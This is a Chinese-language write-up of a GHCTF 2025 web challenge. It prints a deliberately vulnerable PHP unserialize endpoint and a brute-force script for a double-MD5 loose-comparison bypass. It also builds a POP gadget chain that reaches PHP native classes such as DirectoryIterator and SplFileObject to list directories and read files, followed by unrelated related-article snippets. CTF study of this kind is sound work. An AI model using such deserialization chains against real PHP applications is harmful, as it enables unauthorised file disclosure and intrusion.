[GHCTF 2025]Popppppp[pop链构造] [php原生类的利用] [双md5加密绕过]
题目
<?php
error_reporting(0);class CherryBlossom {public $fruit1;public $fruit2;public function __construct($a) {$this->fruit1 = $a;}function __destruct() {echo $this->fruit1;}public function __toString() {$newFunc = $this->fruit2;return $newFunc();}
}class Forbidden {private $fruit3;public function __construct($string) {$this->fruit3 = $string;}public function __get($name) {$var = $this->$name;$var[$name]();}
}class Warlord {public $fruit4;public $fruit5;public $arg1;public function __call($arg1, $arg2) {$function = $this->fruit4;return $function();}public function __get($arg1) {$this->fruit5->ll2('b2');}
}class Samurai {public $fruit6;public $fruit7;public function __toString() {$long = @$this->fruit6->add();return $long;}public function __set($arg1, $arg2) {if ($this->fruit7->tt2) {echo "xxx are the best!!!";}}
}class Mystery {public function __get($arg1) {array_walk($this, function ($day1, $day2) {$day3 = new $day2($day1);foreach ($day3 as $day4) {echo ($day4 . '<br>');}});}
}class Princess {protected $fruit9;protected function addMe() {return "The time spent with xxx is my happiest time" . $this->fruit9;}public function __call($func, $args) {call_user_func([$this, $func . "Me"], $args);}
}class Philosopher {public $fruit10;public $fruit11="sr22kaDugamdwTPhG5zU";public function __invoke() {if (md5(md5($this->fruit11)) == 666) {return $this->fruit10->hey;}}
}class UselessTwo {public $hiddenVar = "123123";public function __construct($value) {$this->hiddenVar = $value;}public function __toString() {return $this->hiddenVar;}
}class Warrior {public $fruit12;private $fruit13;public function __set($name, $value) {$this->$name = $value;if ($this->fruit13 == "xxx") {strtolower($this->fruit12);}}
}class UselessThree {public $dummyVar;public function __call($name, $args) {return $name;}
}class UselessFour {public $lalala;public function __destruct() {echo "Hehe";}
}if (isset($_GET['GHCTF'])) {unserialize($_GET['GHCTF']);
} else {highlight_file(__FILE__);
}
这个一开始真没看出来是原生类的利用,光知道call_user_func()了
一些魔术方法再次复习:
- __call():当访问不存在的方法时调用
- __set():当给一个不存在的属性赋值的时候触发
- __get():当访问不存在的属性的时候调用
- __invoke():当把类当作函数调用的时候触发
双重md5加密绕过
if (md5(md5($this->fruit11)) == 666)ai写的脚本
import hashlib #可以进行md5计算(哈希)
import itertools #创建迭代器
def find_collision():chars = 'abcdefghijklmnopqrstuvwxyz0123456789'for s in itertools.product(chars, repeat=4): # 使用itertools.product函数生成所有可能的长度为 4 的字符串组合,根据计算力调整长度s = ''.join(s)first_hash = hashlib.md5(s.encode()).hexdigest()second_hash = hashlib.md5(first_hash.encode()).hexdigest()if second_hash.startswith('666') and not second_hash[3].isdigit():return sreturn Nonesolution = find_collision()
print(f"Payload: {solution}") # 输出符合要求的字符串爆破得 abe2 可以
pop链
CherryBlossom()--->Samurai()--->Warlord()--->Philosopher()--->Mystrey()__destruct() __toString() __call() __invoke() __get()fruit1 fruit6 fruit4 fruit10 $cb=new CherryBlossom();
$cb->fruit1=new Samurai();
$cb->fruit1->fruit6=new Warlord();
$cb->fruit1->fruit6->fruit4=new Philosopher();
$cb->fruit1->fruit6->fruit4->fruit10=new Mystery();echo serialize($cb);利用array_walk():
array_walk()用于遍历数组并对每个元素执行自定义的回调函数
在这里是:
array_walk($this, function ($day1, $day2) //day1是参数,day2是原生类
{$day3 = new $day2($day1); //实例化类 此时day3应该是数组之类的东西foreach ($day3 as $day4) {echo ($day4 . '<br>');}
});遍历类 $this,但是他是一个类不是数组,在php底层会将类转换成数组:
规则如下:
公共属性(
public):会被保留,键名为属性名,键值为属性值。受保护属性(
protected):键名前会添加\0*\0(空字符标记),例如\0*\0fruit9。私有属性(
private):键名前会添加\0类名\0,例如\0Forbidden\0fruit3。
也就是说这里如果自己设置一个属性,键值和键名都是我们来定义,就用到了php原生类
php常见原生类读取文件
| 名字 | 作用 | 举例 |
| DirectoryIterator | 查看文件系统目录(查看目录) | DirectoryIterator("/") |
| FilesystemIterator | 基本同上 | FilesystemIterator("/") |
| GlobIterator | 可以通过模式匹配来寻找文件路径 | GlobIterator("f*.txt")[知道文件部分名字] |
| SplFileObject | 文件内容的遍历、查找和操作(查看文件) | SplFileObject("/path/to/file.txt") |
查看目录用 DirectoryIterator 或者 FilesystemIterator 都行
查看文件用 SplFileObject
相关文章:
[GHCTF 2025]Popppppp[pop链构造] [php原生类的利用] [双md5加密绕过]
题目 <?php error_reporting(0);class CherryBlossom {public $fruit1;public $fruit2;public function __construct($a) {$this->fruit1 $a;}function __destruct() {echo $this->fruit1;}public function __toString() {$newFunc $this->fruit2;return $new…...
2025.3.20总结
阅读:《时间贫穷》第二章,里面讲到,运动,多行善事,体验自然,都会增强自我效能感,是对抗时间焦虑的强有力的方式。 花时间运动是值得的,公司每周三都是运动周,把运动视作…...
Tr0ll2靶机详解
一、主机发现 arp-scan -l靶机ip:192.168.55.164 二、端口扫描、漏洞扫描、目录枚举、指纹识别 2.1端口扫描 nmap --min-rate 10000 -p- 192.168.55.164发现21端口的ftp服务开启 以UDP协议进行扫描 使用参数-sU进行UDP扫描 nmap -sU --min-rate 10000 -p- 19…...
制造业数字化转型,汽车装备制造企业数字化转型案例,智能制造数字化传统制造业数字化制造业数字化转型案例
《某制造业企业信息化整体解决方案》PPT展示了一个汽车装备企业的整体信息化解决方案,阐述了该企业的业务特点和现状,主要包括按订单生产、多级计划和产品跟踪等,分析了信息化建设的主要困难,如信息管理手工化、过程数据追溯困难、…...
PyTorch模型转ONNX例子
参考:(optional) Exporting a Model from PyTorch to ONNX and Running it using ONNX Runtime — PyTorch Tutorials 2.6.0cu124 documentation import numpy as np import torch.utils.model_zoo as model_zoo import torch.onnx import torch.nn as nn import t…...
科技云报到:AI Agent打了个响指,商业齿轮加速转动
科技云报到原创。 3月16日,百度旗下文心大模型4.5和文心大模型X1正式发布。目前,两款模型已在文心一言官网上线,免费向用户开放。 同时,文心大模型4.5已上线百度智能云千帆大模型平台,企业用户和开发者登录即可调用AP…...
【蓝桥杯python研究生组备赛】005 数学与简单DP
题目1 01背包 有 N 件物品和一个容量是 V 的背包。每件物品只能使用一次。 第 i 件物品的体积是 vi,价值是 wi。 求解将哪些物品装入背包,可使这些物品的总体积不超过背包容量,且总价值最大。 输出最大价值。 输入格式 第一行两个整数&a…...
Chapter 4-16. Troubleshooting Congestion in Fibre Channel Fabrics
Show FCS Ie Example 4-17 shows the NX-OS command show fcs ie on Cisco MDS switches. 例 4-17 显示了 Cisco MDS 交换机上的 NX-OS 命令 show fcs ie。 Example 4-17 NX-OS command show fcs ie on Cisco MDS switches MDS9706-C# show fcs ie IE List for VSAN: 20 --…...
抖音视频数据获取实战:从API调用到热门内容挖掘
在短视频流量为王的时代,掌握抖音热门视频数据已成为内容运营、竞品分析及营销决策的关键。本文将手把手教你通过抖音开放平台API获取视频详情数据,并提供完整的代码实现及商业化应用思路。 一、抖音API权限申请与核心接口 抖音API需企业资质认证&…...
大白话读懂java对象创建的过程
1. java对象创建流程(大白话版) 咱们java对象被创建的过程大致如下,即: 在 JVM 中对象的创建,从⼀个 new 指令开始: 首先检查这个指令的参数是否能在常量池中定位到⼀个类的符号引用检查这个符号引用代表…...
Ubutu20.04安装docker与docker-compose
系统:20.04.6 LTS (Focal Fossa)" 1.配置apt源(在/etc/apt/sources.list中输入以下内容) # deb cdrom:[Ubuntu 20.04.6 LTS _Focal Fossa_ - Release amd64 (20230316)]/ focal main restricted deb http://mirrors.aliyun.com/ubuntu/ focal main restricted …...
AI图像理解技术的演进
在CLIP等现代多模态模型出现之前,早期的图生文技术主要依赖人工标注的ImageNet等数据集,但其技术路线与当前方法存在本质差异。 一、传统图生文技术的标注依赖 ImageNet的核心地位 在2012-2020年间,ImageNet的1,400万张人工标注图像ÿ…...
STM32 —— MCU、MPU、ARM、FPGA、DSP
在嵌入式系统中,MCU、MPU、ARM、FPGA和DSP是核心组件,各自在架构、功能和应用场景上有显著差异。以下从专业角度详细解析这些概念: 一、 MCU(Microcontroller Unit,微控制器单元) 核心定义 集成系统芯片&a…...
aiosignal
文章目录 安装 一、关于 aiosignal Github : https://github.com/aio-libs/aiosignal官方文档:https://aiosignal.aio-libs.org/gitter聊天:https://gitter.im/aio-libs/Lobby许可证 : Apache 2 aiosignal 管理 asyncio 项目中回调的项目。 Signal是已…...
在 VSCode 远程开发环境下使用 Git 常用命令
在日常开发过程中,无论是单人项目还是团队协作,Git 都是版本管理的利器。尤其是在使用 VSCode 连接远程服务器进行代码开发时,Git 不仅能帮助你管理代码版本,还能让多人协作变得更加高效。本文将介绍一些常用的 Git 命令ÿ…...
电脑节电模式怎么退出 分享5种解决方法
在使用电脑的过程中,许多用户为了节省电力,通常会选择开启电脑的节能模式。然而,在需要更高性能或进行图形密集型任务时,节能模式可能会限制系统的性能表现。这时,了解如何正确地关闭或调整节能设置就显得尤为重要了。…...
kubernetes高级实战
一、模拟企业环境进行一个实战部署 [rootmaster node]# kubectl apply -f pod-tomcat.yaml pod/tomcat-test created [rootmaster node]# kubectl get pods NAME READY STATUS RESTARTS AGE tomcat-test 2/2 Running 0 2s [rootmaster node]…...
【Java】——程序逻辑控制(构建稳健代码的基石)
🎁个人主页:User_芊芊君子 🎉欢迎大家点赞👍评论📝收藏⭐文章 🔍系列专栏:【Java】内容概括 文章目录: 一.顺序结构二.分支结构1.if 语句1.1 语法格式11.2 语法格式21.3 语法格式3 …...
QT编程之PCM音频处理
一、高级播放接口(未压缩编码的音频文件) QMediaPlayer 支持MP3/WMA等压缩格式及网络流媒体播放,集成媒体控制(播放/暂停/进度调节)需设置QAudioOutput指定输出设备,支持播放速度调节(setPl…...
卫星互联网智慧杆:开启智能城市新时代
哇哦!在当下这个数字化浪潮正以雷霆万钧之势席卷全球的超酷时代,智慧城市建设已然成为世界各国你追我赶、竞相发力的核心重点领域啦!而咱们的卫星互联网智慧杆,作为一项完美融合了卫星通信与物联网顶尖技术的创新结晶,…...
Numpy broadcasting规则
Numpy的broadcast操作是为了将两个不同形状的数组,通过一系列规则,变换成形状相同的数组,从而使得它们之间可以进行按元素进行的计算。 Broadcasting的机制并不复杂,只要记住以下几条规则就可以了: 1. 顺序。首先&am…...
掌握 Shopee 商品数据:用爬虫解锁无限商机
在电商的浩瀚宇宙中,Shopee 宛如一颗璀璨星辰,吸引着无数卖家与买家在此汇聚。对于电商从业者、市场调研人员或是数据分析师而言,获取 Shopee 店铺的商品信息就如同掌握了开启财富之门的钥匙。而爬虫技术,正是帮助我们高效获取这些…...
Qt-QChart实现折线图
一、介绍场景 动态查看数据变化,或者了解数据发展趋势,让数据可以形象直观展现出来,这里推荐使用折线图的方式展现,本文抛砖引玉,简单实现一个实例,效果图如下: 二、实现步骤 1、charts组件 …...
取消Win10锁屏界面上显示的天气、市场和广告的操作
要取消Win10锁屏界面上显示的天气、市场和广告,您可以按照以下步骤操作: 方法一:更改锁屏界面设置 打开“设置”: 点击“开始”菜单,然后点击齿轮状的“设置”图标。 进入“个性化”: 在“设置”窗口中&a…...
IoT设备测试:从协议到硬件的全栈验证体系与实践指南
一、引言:IoT技术浪潮下的质量挑战 根据IDC预测,到2027年全球IoT设备数量将突破290亿台,涵盖智能家居、工业物联网(IIoT)、智慧城市、车联网等场景。然而,IoT系统的复杂性远超传统嵌入式设备——硬件异构性…...
大白话详细解读React框架的diffing算法
1. Diffing 算法是什么? Diffing 算法是 React 用来比较虚拟 DOM(Virtual DOM)树的一种算法。它的作用是找出前后两次渲染之间的差异(diff),然后只更新这些差异部分,而不是重新渲染整个页面。 …...
自然语言处理入门
第一章 自然语言处理入门 1 什么是自然语言处理 【什么是人工智能,分别对应哪几个领域】 AI是模仿甚至超越人的某项机能,NLP、CV、ASR NLP是机器理解并生成人类语言2 自然语言处理的发展简史 1950 -- 图灵提出“机器能思考吗”,划时代性的…...
Arduino示例代码讲解:Pitch follower 跟随
Arduino示例代码讲解:Pitch follower 跟随 Pitch follower代码功能代码逐行解释1. 注释部分功能:硬件连接:2. `setup()` 函数3. `loop()` 函数硬件连接**扬声器连接**:**光敏电阻连接**:**Arduino板**:运行结果修改建议视频讲解Pitch follower 这段代码是一个Arduino示例…...
从TouchDriver Pro到Touchdriver G1,Weart触觉手套全系解析:XR交互的“真实触感”如何实现?
Weart旗下的Touchdriver Pro触觉手套和Touchdriver G1触觉手套,凭借其技术创新,为用户带来了全新的触觉体验。Touchdriver Pro触觉手套通过多模态触觉反馈技术,提供力反馈、纹理渲染和温度提示,让用户在虚拟环境中感受到真实的触觉…...
-双指针(Java 2023 B卷 100分))
华为OD机试-阿里巴巴找黄金宝箱(I)-双指针(Java 2023 B卷 100分)
题目描述 阿里巴巴在去砍柴的路上发现了强盗集团的藏宝地,藏宝地有编号从 0 到 N 的箱子,每个箱子上贴有一个数字。黄金宝箱满足排在它之前的所有箱子数字和等于排在它之后的所有箱子数字和。第一个箱子左边部分的数字和定义为 0;最后一个宝箱右边部分的数字和定义为 0。请…...